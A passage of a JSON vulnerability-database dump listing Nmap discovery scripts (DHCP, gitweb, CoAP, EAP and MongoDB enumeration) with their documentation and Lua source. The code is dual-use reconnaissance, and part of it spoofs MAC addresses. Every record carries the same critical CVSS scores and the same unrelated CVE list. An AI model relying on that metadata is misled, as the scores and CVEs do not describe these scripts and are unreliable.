DHCPDISCOVER\n--\n\n\nauthor = \"Ron Bowes\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"safe\"}\n\n\n-- We want to run against a specific host if UDP/67 is open\nfunction portrule(host, port)\n if nmap.address_family() ~= 'inet' then\n stdnse.debug1(\"is IPv4 compatible only.\")\n return false\n end\n\n return shortport.portnumber(67, \"udp\")(host, port)\nend\n\naction = function(host, port)\n local dhcptype = (stdnse.get_script_args(SCRIPT_NAME .. \".dhcptype\") or \"DHCPINFORM\"):upper()\n local dhcptypeid = dhcp.request_types[dhcptype]\n if not dhcptypeid then\n return stdnse.format_output(false, \"Invalid request type (use \"\n .. table.concat(dhcp.request_types_str, \" / \")\n .. \")\")\n end\n\n local reqcount = tonumber(stdnse.get_script_args(SCRIPT_NAME .. \".requests\") or 1)\n if not reqcount then\n return stdnse.format_output(false, \"Invalid request count\")\n end\n\n local iface, err = nmap.get_interface_info(host.interface)\n if not (iface and iface.address) then\n return stdnse.format_output(false, \"Couldn't determine local IP for interface: \" .. host.interface)\n end\n\n local overrides = {}\n\n local macaddr = (stdnse.get_script_args(SCRIPT_NAME .. \".mac\") or \"native\"):lower()\n -- Support for legacy argument \"randomize_mac\"\n local randomize = (stdnse.get_script_args(SCRIPT_NAME .. 
\".randomize_mac\") or \"false\"):lower()\n if randomize == \"true\" or randomize == \"1\" then\n stdnse.debug1(\"Use %s.mac=random instead of %s.randomize_mac=%s\", SCRIPT_NAME, SCRIPT_NAME, randomize)\n macaddr = \"random\"\n end\n if macaddr ~= \"native\" then\n -- Set the scanner as a relay agent\n overrides.giaddr = string.unpack(\"<I4\", ipOps.ip_to_str(iface.address))\n end\n local macaddr_iter\n if macaddr:find(\"^ra?nd\") then\n macaddr_iter = function () return rand.random_string(6) end\n else\n if macaddr == \"native\" then\n macaddr = host.mac_addr_src\n else\n macaddr = macaddr:gsub(\":\", \"\")\n if not (#macaddr == 12 and macaddr:find(\"^%x+$\")) then\n return stdnse.format_output(false, \"Invalid MAC address\")\n end\n macaddr = stdnse.fromhex(macaddr)\n end\n macaddr_iter = function () return macaddr end\n end\n\n local results = {}\n for i = 1, reqcount do\n local macaddr = macaddr_iter()\n stdnse.debug1(\"Client MAC address: %s\", stdnse.tohex(macaddr, {separator = \":\"}))\n local status, result = dhcp.make_request(host.ip, dhcptypeid, iface.address, macaddr, nil, nil, overrides)\n if not status then\n return stdnse.format_output(false, \"Couldn't send DHCP request: \" .. 
result)\n end\n table.insert(results, result)\n end\n\n if #results == 0 then\n return nil\n end\n\n nmap.set_port_state(host, port, \"open\")\n\n local response = stdnse.output_table()\n\n -- Display the results\n for i, result in ipairs(results) do\n local result_table = stdnse.output_table()\n\n if dhcptype ~= \"DHCPINFORM\" then\n result_table[\"IP Offered\"] = result.yiaddr_str\n end\n for _, v in ipairs(result.options) do\n if type(v.value) == 'table' then\n outlib.list_sep(v.value)\n end\n result_table[ v.name ] = v.value\n end\n\n if(#results == 1) then\n response = result_table\n else\n response[string.format(\"Response %d of %d\", i, #results)] = result_table\n end\n end\n\n return response\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:43:46", "description": "Retrieves a list of Git projects, owners and descriptions from a gitweb (web interface to the Git revision control system).\n\n## Script Arguments \n\n#### http-gitweb-projects-enum.path \n\nspecifies the location of gitweb (default: /)\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap -p80 www.example.com --script http-gitweb-projects-enum\n \n\n## Script Output \n \n \n 80/tcp open http\n | http-gitweb-projects-enum:\n | Projects from gitweb.samba.org:\n | PROJECT AUTHOR DESCRIPTION\n | sando.git authornum1 no description\n | camui/san.git devteam no description\n | albert/tdx.git/.git blueteam no description\n |\n | Number of projects: 172\n |_ Number of owners: 42\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-04-20T12:46:49", "type": "nmap", "title": "http-gitweb-projects-enum NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-03-24T22:05:51", "id": "NMAP:HTTP-GITWEB-PROJECTS-ENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/http-gitweb-projects-enum.html", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = 
require \"string\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\n\ndescription=[[\nRetrieves a list of Git projects, owners and descriptions from a gitweb (web interface to the Git revision control system).\n]]\n\n---\n-- @usage\n-- nmap -p80 www.example.com --script http-gitweb-projects-enum\n--\n-- @output\n-- 80/tcp open http\n-- | http-gitweb-projects-enum:\n-- | Projects from gitweb.samba.org:\n-- | PROJECT AUTHOR DESCRIPTION\n-- | sando.git authornum1 no description\n-- | camui/san.git devteam no description\n-- | albert/tdx.git/.git blueteam no description\n-- |\n-- | Number of projects: 172\n-- |_ Number of owners: 42\n--\n-- @args http-gitweb-projects-enum.path specifies the location of gitweb\n-- (default: /)\n\nauthor = \"riemann\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nportrule = shortport.http\n\n---\n-- @param author bloc (if author name are too long we have a span bloc)\n-- @return author name filtred from html entities\n---\nget_owner = function(res)\n local result=res\n local _\n if ( res:match('<span') ) then\n _,_,result=string.find(res,'title=\"(.-)\"')\n end\n return result\nend\n\naction = function(host, port)\n\n local path = stdnse.get_script_args(SCRIPT_NAME .. 
'.path') or '/'\n local response = http.get(host,port,path)\n local result, result_stats = {}, {}\n\n if not response or not response.status or response.status ~= 200 or\n not response.body then\n stdnse.debug1(\"Failed to retrieve file: %s\", path)\n return\n end\n\n local html = response.body\n local repo=tab.new()\n tab.addrow(repo,'PROJECT','AUTHOR','DESCRIPTION')\n\n -- verif generator\n if (html:match('meta name=\"generator\" content=\"gitweb(.-)\"')) then\n result['name'] = string.format(\"Projects from %s:\", host.targetname or host.ip)\n\n local owners, projects_counter, owners_counter = {}, 0, 0\n\n for tr_code in html:gmatch('(%<tr[^<>]*%>(.-)%</tr%>)') do\n local regx='<a[^<>]*href=\"(.-)\">(.-)</a>(.-)title=\"(.-)\"(.-)<i>(.-)</i>'\n for _, project, _, desc, _, owner in tr_code:gmatch(regx) do\n\n --if desc result return default text of gitweb replace it by no description\n if(string.find(desc,'Unnamed repository')) then\n desc='no description'\n end\n\n tab.addrow(repo, project, get_owner(owner), desc)\n\n -- Protect from parsing errors or long owners\n -- just an arbitrary value\n if owner:len() < 128 and not owners[owner] then\n owners[owner] = true\n owners_counter = owners_counter + 1\n end\n\n projects_counter = projects_counter + 1\n end\n end\n\n table.insert(result,tab.dump(repo))\n table.insert(result, \"\")\n table.insert(result,\n string.format(\"Number of projects: %d\", projects_counter))\n if (owners_counter > 0 ) then\n table.insert(result,\n string.format(\"Number of owners: %d\", owners_counter))\n end\n\n end\n return stdnse.format_output(true,result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:22", "description": "Dumps list of available resources from CoAP endpoints. \n\nThis script establishes a connection to a CoAP endpoint and performs a GET request on a resource. 
The default resource for our request is <code>/.well-known/core</code>, which should contain a list of resources provided by the endpoint. Only plain (non-DTLS) CoAP is supported; DTLS-protected <code>coaps</code> endpoints (UDP port 5684) are not probed. \n\nFor additional information: \n\n * <https://en.wikipedia.org/wiki/Constrained_Application_Protocol>\n * <https://tools.ietf.org/html/rfc7252>\n * <https://tools.ietf.org/html/rfc6690>\n\n## Script Arguments \n\n#### coap-resources.uri \n\nURI to request via the GET method, `/.well-known/core` by default.\n\n## Example Usage \n \n \n nmap -p U:5683 -sU --script coap-resources <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 5683/udp open coap udp-response ttl 36\n | coap-resources:\n | /large:\n | rt: block\n | sz: 1280\n | title: Large resource\n | /large-update:\n | ct: 0\n | rt: block\n | sz: 55\n | title: Large resource that can be updated using PUT method\n | /link1:\n | if: If1\n | rt: Type1 Type2\n |_ title: Link test resource\n \n\n## Requires \n\n * [coap](<../lib/coap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [stringaux](<../lib/stringaux.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-09-08T21:19:55", "type": "nmap", "title": "coap-resources NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:COAP-RESOURCES.NSE", "href": "https://nmap.org/nsedoc/scripts/coap-resources.html", "sourceData": "local coap = require \"coap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal stringaux = require \"stringaux\"\nlocal table = require \"table\"\n\ndescription = [[\nDumps list of available resources from CoAP endpoints.\n\nThis script establishes a connection to a CoAP endpoint and performs a\nGET request on a resource. The default resource for our request is\n<code>/.well-known/core</core>, which should contain a list of\nresources provided by the endpoint.\n\nFor additional information:\n* https://en.wikipedia.org/wiki/Constrained_Application_Protocol\n* https://tools.ietf.org/html/rfc7252\n* https://tools.ietf.org/html/rfc6690\n]]\n\n---\n-- @usage nmap -p U:5683 -sU --script coap-resources <target>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 5683/udp open coap udp-response ttl 36\n-- | coap-resources:\n-- | /large:\n-- | rt: block\n-- | sz: 1280\n-- | title: Large resource\n-- | /large-update:\n-- | ct: 0\n-- | rt: block\n-- | sz: 55\n-- | title: Large resource that can be updated using PUT method\n-- | /link1:\n-- | if: If1\n-- | rt: Type1 Type2\n-- |_ title: Link test resource\n--\n-- @args coap-resources.uri URI to request via the GET method,\n-- <code>/.well-known/core</code> by default.\n--\n-- @xmloutput\n-- <table key=\"/\">\n-- <elem key=\"ct\">0</elem>\n-- <elem key=\"title\">General Info</elem>\n-- </table>\n-- <table key=\"/ft\">\n-- <elem key=\"ct\">0</elem>\n-- <elem key=\"title\">Faults Reporting</elem>\n-- </table>\n-- <table key=\"/mn\">\n-- <elem key=\"ct\">0</elem>\n-- <elem key=\"title\">Monitor Reporting</elem>\n-- </table>\n-- <table key=\"/st\">\n-- <elem 
key=\"ct\">0</elem>\n-- <elem key=\"title\">Status Reporting</elem>\n-- </table>\n-- <table key=\"/time\">\n-- <elem key=\"ct\">0</elem>\n-- <elem key=\"obs,</devices/block>;title\">Devices Block</elem>\n-- <elem key=\"title\">Internal Clock</elem>\n-- </table>\n-- <table key=\"/wn\">\n-- <elem key=\"ct\">0</elem>\n-- <elem key=\"title\">Warnings Reporting</elem>\n-- </table>\n\nauthor = \"Mak Kolybabi <mak@kolybabi.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\", \"discovery\"}\n\n-- TODO: Add 5684 \"coaps\" if DTLS support is added\nportrule = shortport.port_or_service(5683, \"coap\", \"udp\")\n\nformat_payload = function(payload)\n -- Leave strings alone.\n if type(payload) == \"string\" then\n return payload\n end\n\n local tbl = stdnse.output_table()\n\n -- We want to go through all of the links in alphabetical order.\n table.sort(payload, function(a,b) return a.name < b.name end)\n\n for _, link in ipairs(payload) do\n -- We want to go through all of the parameters in alphabetical\n -- order.\n table.sort(link.parameters, function(a,b) return a.name < b.name end)\n\n local row = stdnse.output_table()\n for _, param in ipairs(link.parameters) do\n row[param.name] = param.value\n end\n\n tbl[link.name] = row\n end\n\n return tbl\nend\n\nget_blocks = function(helper, options, b2opt, payload, max_reqs)\n -- Initialize the block table to store all of our received blocks.\n local blocks = {}\n blocks[b2opt.number] = payload\n\n -- If we don't know the number of the last block, we'll need to use\n -- the largest number we've seen as the maxumum.\n local max = b2opt.number\n\n -- If the first block we received happens to be the last one, either\n -- by being a one-block sequence or by the endpoint sending us the\n -- last block in the sequence first, we want to record the final\n -- number in the sequence.\n local last = nil\n if b2opt.more == false then\n last = b2opt.number\n max = b2opt.number\n end\n\n -- We'll 
continue to request blocks that are the same size as the\n -- original block, since the endpoint likely prefers that.\n local length = b2opt.length\n\n -- We want to track the number of requests we make so that a\n -- malicious endpoint can't keep us on the hook forever.\n for req = 1, max_reqs do\n -- Determine if there are any blocks in the sequence that we have\n -- not yet received.\n local top = max + 1\n if last then\n top = last\n end\n\n local num = top\n for i = 0, top do\n if not blocks[i] then\n num = i\n break\n end\n end\n\n -- If the block we think we're missing is at the end of the\n -- sequence, we've got them all.\n if last and num >= last then\n stdnse.debug3(\"All %d blocks have been retrieved.\", last)\n break\n end\n\n -- Create the request.\n local opts = {\n [\"code\"] = \"get\",\n [\"type\"] = \"confirmable\",\n [\"options\"] = {\n {[\"name\"] = \"block2\", [\"value\"] = {\n [\"number\"] = num,\n [\"more\"] = false,\n [\"length\"] = length\n }}\n }\n }\n\n local components = stringaux.strsplit(\"/\", options.uri)\n for _, component in ipairs(components) do\n if component ~= \"\" then\n table.insert(opts.options, {[\"name\"] = \"uri_path\", [\"value\"] = component})\n end\n end\n\n -- Send the request and receive the response.\n stdnse.debug3(\"Requesting block %d of size %d.\", num, length)\n local status, response = helper:request(opts)\n if not status then\n return false, response\n end\n\n if not response.payload then\n return false, \"Response did not contain a payload.\"\n end\n\n -- Check for the presence of the block2 option, and if it's\n -- missing then we're going to stop.\n b2opt = coap.COAP.header.find_option(response, \"block2\")\n if not b2opt then\n stdnse.debug1(\"Stopped requesting more blocks, response found without block2 option.\")\n break\n end\n\n stdnse.debug3(\"Received block %d of size %d.\", b2opt.number, b2opt.length)\n blocks[b2opt.number] = response.payload\n\n if b2opt.more == false then\n stdnse.debug3(\"Block 
%d indicates it is the end of the sequence.\", b2opt.number, b2opt.length)\n last = b2opt.number\n max = b2opt.number\n elseif b2opt.number > max then\n max = b2opt.number\n end\n end\n\n -- Reassemble payload, handling potentially missing blocks.\n local result = \"\"\n for i = 1, max do\n if not blocks[i] then\n stdnse.debug3(\"Block %d is missing, replacing with dummy data.\", i)\n result = result .. (\"<! missing block %d!>\"):format(i)\n else\n result = result .. blocks[i]\n end\n end\n\n return true, result\nend\n\nlocal function parse_args ()\n local args = {}\n\n local uri = stdnse.get_script_args(SCRIPT_NAME .. '.uri')\n if not uri then\n uri = \"/.well-known/core\"\n end\n args.uri = uri\n\n return true, args\nend\n\naction = function(host, port)\n local output = stdnse.output_table()\n\n -- Parse and sanity check the command line arguments.\n local status, options = parse_args()\n if not status then\n output.ERROR = options\n return output, output.ERROR\n end\n\n -- Create an instance of the CoAP library's client object.\n local helper = coap.Helper:new(host, port)\n\n -- Connect to the CoAP endpoint.\n local status, response = helper:connect({[\"uri\"] = options.uri})\n if not status then\n -- Erros at this stage indicate we're probably not talking to a CoAP server,\n -- so we exit silently.\n return nil\n end\n\n -- Check that the response is a 2.05, otherwise we don't know how to\n -- continue.\n if response.code ~= \"content\" then\n -- If the port runs an echo service, we'll see an unexpected 'get' code.\n if response.code == \"get\" then\n -- Exit silently, this has all been a mistake.\n return nil\n end\n\n -- If the requested resource wasn't found, that's okay.\n if response.code == \"not_found\" then\n stdnse.debug1(\"The target reports that the resource '%s' was not found.\", options.uri)\n return nil\n end\n\n -- Otherwise, we assume that we're getting a legitimate CoAP response.\n output.ERROR = (\"Server responded with '%s' code where 
'content' was expected.\"):format(response.code)\n return output, output.ERROR\n end\n\n local result = response.payload\n if not result then\n output.ERROR = \"Payload for initial response was not part of the packet.\"\n return output, output.ERROR\n end\n\n -- Check for the presence of the block2 option, which indicates that\n -- we'll need to perform more requests.\n local b2opt = coap.COAP.header.find_option(response, \"block2\")\n if b2opt then\n -- Since the block2 option was used, the payload should be an unparsed string.\n assert(type(result) == \"string\")\n\n local status, payload = get_blocks(helper, options, b2opt, result, 64)\n if not status then\n output.ERROR = result\n return output, output.ERROR\n end\n result = result .. payload\n\n -- Parse the payload.\n local status, parsed = coap.COAP.payload.parse(response, result)\n if not status then\n stdnse.debug1(\"Failed to parse payload: %s\", parsed)\n stdnse.debug1(\"Falling back to returning raw payload as last resort.\")\n output[\"Raw CoAP response\"] = result\n return output, stdnse.format_output(true, output)\n end\n\n result = parsed\n end\n\n -- Regardless of whether the block2 option was used, we should now have a\n -- parsed payload in some format or another. 
For now, they should all be\n -- strings or tables.\n assert(type(result) == \"string\" or type(result) == \"table\")\n\n -- If the payload has been parsed, and we requested the default\n -- resource, then we know how to format it nicely.\n local formatted = result\n if true then\n formatted = format_payload(result)\n end\n\n return formatted\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:32", "description": "Enumerates the authentication methods offered by an EAP (Extensible Authentication Protocol) authenticator for a given identity or for the anonymous identity if no argument is passed.\n\n## Script Arguments \n\n#### eap-info.identity \n\nIdentity to use for the first step of the authentication methods (if omitted \"anonymous\" will be used).\n\n#### eap-info.scan \n\nTable of authentication methods to test, e.g. { 4, 13, 25 } for MD5, TLS and PEAP. Default: TLS, TTLS, PEAP, MSCHAP.\n\n#### eap-info.timeout \n\nMaximum time allowed for the scan (default 10s). 
Methods not tested because of timeout will be listed as \"unknown\".\n\n#### eap-info.interface \n\nNetwork interface to use for the scan, overrides \"-e\".\n\n## Example Usage \n \n \n nmap -e interface --script eap-info [--script-args=\"eap-info.identity=0-user,eap-info.scan={13,50}\"] <target>\n \n\n## Script Output \n \n \n Pre-scan script results:\n | eap-info:\n | Available authentication methods with identity=\"anonymous\" on interface eth2\n | true PEAP\n | true EAP-TTLS\n | false EAP-TLS\n |_ false EAP-MSCHAP-V2\n \n\n## Requires \n\n * [eap](<../lib/eap.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-03-08T18:00:35", "type": "nmap", "title": "eap-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-03-24T22:05:52", "id": "NMAP:EAP-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/eap-info.html", "sourceData": "local eap = require \"eap\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = 
require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nEnumerates the authentication methods offered by an EAP (Extensible\nAuthentication Protocol) authenticator for a given identity or for the\nanonymous identity if no argument is passed.\n]]\n\n---\n-- @usage\n-- nmap -e interface --script eap-info [--script-args=\"eap-info.identity=0-user,eap-info.scan={13,50}\"] <target>\n--\n-- @output\n-- Pre-scan script results:\n-- | eap-info:\n-- | Available authentication methods with identity=\"anonymous\" on interface eth2\n-- | true PEAP\n-- | true EAP-TTLS\n-- | false EAP-TLS\n-- |_ false EAP-MSCHAP-V2\n--\n-- @args eap-info.identity Identity to use for the first step of the authentication methods (if omitted \"anonymous\" will be used).\n-- @args eap-info.scan Table of authentication methods to test, e.g. { 4, 13, 25 } for MD5, TLS and PEAP. Default: TLS, TTLS, PEAP, MSCHAP.\n-- @args eap-info.interface Network interface to use for the scan, overrides \"-e\".\n-- @args eap-info.timeout Maximum time allowed for the scan (default 10s). Methods not tested because of timeout will be listed as \"unknown\".\n\nauthor = \"Riccardo Cecolin\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = { \"broadcast\", \"safe\" }\n\n\nprerule = function()\n return nmap.is_privileged()\nend\n\nlocal default_scan = {\n eap.eap_t.TLS,\n eap.eap_t.TTLS,\n eap.eap_t.PEAP,\n eap.eap_t.MSCHAP,\n}\n\nlocal UNKNOWN = \"unknown\"\n\naction = function()\n\n local arg_interface = stdnse.get_script_args(SCRIPT_NAME .. \".interface\")\n local arg_identity = stdnse.get_script_args(SCRIPT_NAME .. \".identity\")\n local arg_scan = stdnse.get_script_args(SCRIPT_NAME .. \".scan\")\n local arg_timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. 
\".timeout\"))\n local iface\n\n -- trying with provided interface name\n if arg_interface then\n iface = nmap.get_interface_info(arg_interface)\n end\n\n -- trying with default nmap interface\n if not iface then\n local iname = nmap.get_interface()\n if iname then\n iface = nmap.get_interface_info(iname)\n end\n end\n\n -- failed\n if not iface then\n return \"please specify an interface with -e\"\n end\n stdnse.debug1(\"iface: %s\", iface.device)\n\n local timeout = (arg_timeout or 10) * 1000\n\n stdnse.debug2(\"timeout: %s\", timeout)\n\n local pcap = nmap.new_socket()\n pcap:pcap_open(iface.device, 512, true, \"ether proto 0x888e\")\n\n\n local identity = { name=\"anonymous\", auth = {}, probe = -1 }\n\n if arg_identity then\n identity.name = tostring(arg_identity)\n end\n\n local scan\n if arg_scan == nil or type(arg_scan) ~= \"table\" or #arg_scan == 0 then\n scan = default_scan\n else\n scan = arg_scan\n end\n\n local valid = false\n for i,v in ipairs(scan) do\n v = tonumber(v)\n if v ~= nil and v < 256 and v > 3 then\n stdnse.debug1(\"selected: %s\", eap.eap_str[v] or \"unassigned\" )\n identity.auth[v] = UNKNOWN\n valid = true\n end\n end\n\n if not valid then\n return \"no valid scan methods provided\"\n end\n\n local tried_all = false\n\n local start_time = nmap.clock_ms()\n eap.send_start(iface)\n\n while(nmap.clock_ms() - start_time < timeout) and not tried_all do\n local status, plen, l2_data, l3_data, time = pcap:pcap_receive()\n if (status) then\n stdnse.debug2(\"packet size: 0x%x\", plen )\n local packet = eap.parse(l2_data .. 
l3_data)\n\n if packet then\n stdnse.debug2(\"packet valid\")\n\n -- respond to identity requests, using the same session id\n if packet.eap.type == eap.eap_t.IDENTITY and packet.eap.code == eap.code_t.REQUEST then\n stdnse.debug1(\"server identity: %s\",packet.eap.body.identity)\n eap.send_identity_response(iface, packet.eap.id, identity.name)\n end\n\n -- respond with NAK to every auth request to enumerate them until we get a failure\n if packet.eap.type ~= eap.eap_t.IDENTITY and packet.eap.code == eap.code_t.REQUEST then\n stdnse.debug1(\"auth request: %s\",eap.eap_str[packet.eap.type])\n identity.auth[packet.eap.type] = true\n\n identity.probe = -1\n for i,v in pairs(identity.auth) do\n stdnse.debug1(\"identity.auth: %d %s\",i,tostring(v))\n if v == UNKNOWN then\n identity.probe = i\n eap.send_nak_response(iface, packet.eap.id, i)\n break\n end\n end\n if identity.probe == -1 then tried_all = true end\n end\n\n -- retry on failure\n if packet.eap.code == eap.code_t.FAILURE then\n stdnse.debug1(\"auth failure\")\n identity.auth[identity.probe] = false\n\n -- don't give up at the first failure!\n -- mac spoofing to avoid to wait too much\n local d = string.byte(iface.mac,6)\n d = (d + 1) % 256\n iface.mac = iface.mac:sub(1,5) .. string.pack(\"B\",d)\n\n tried_all = true\n for i,v in pairs(identity.auth) do\n if v == UNKNOWN then\n tried_all = false\n break\n end\n end\n if not tried_all then\n eap.send_start(iface)\n end\n end\n\n else\n stdnse.debug1(\"packet invalid! 
wrong filter?\")\n end\n end\n end\n\n local results = { [\"name\"] = (\"Available authentication methods with identity=\\\"%s\\\" on interface %s\"):format(identity.name, iface.device) }\n for i,v in pairs(identity.auth) do\n if v== true then\n table.insert(results, 1, (\"%-8s %s\"):format(tostring(v), eap.eap_str[i] or \"unassigned\" ))\n else\n table.insert(results, (\"%-8s %s\"):format(tostring(v), eap.eap_str[i] or \"unassigned\" ))\n end\n end\n\n for i,v in ipairs(results) do\n stdnse.debug1(\"%s\", tostring(v))\n end\n\n return stdnse.format_output(true, results)\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:40:45", "description": "Attempts to get a list of tables from a MongoDB database.\n\n## Script Arguments \n\n#### mongodb.db \n\nSee the documentation for the [mongodb](<../lib/mongodb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap -p 27017 --script mongodb-databases <host>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 27017/tcp open unknown syn-ack\n | mongodb-databases:\n | ok = 1\n | databases\n | 1\n | empty = false\n | sizeOnDisk = 83886080\n | name = test\n | 0\n | empty = false\n | sizeOnDisk = 83886080\n | name = httpstorage\n | 3\n | empty = true\n | sizeOnDisk = 1\n | name = local\n | 2\n | empty = true\n | sizeOnDisk = 1\n | name = admin\n |_ totalSize = 167772160\n\n## Requires \n\n * [creds](<../lib/creds.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [mongodb](<../lib/mongodb.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-01-29T22:23:06", "type": "nmap", "title": "mongodb-databases NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-05-07T20:15:22", "id": "NMAP:MONGODB-DATABASES.NSE", "href": "https://nmap.org/nsedoc/scripts/mongodb-databases.html", "sourceData": "local creds = require \"creds\"\nlocal nmap = require 
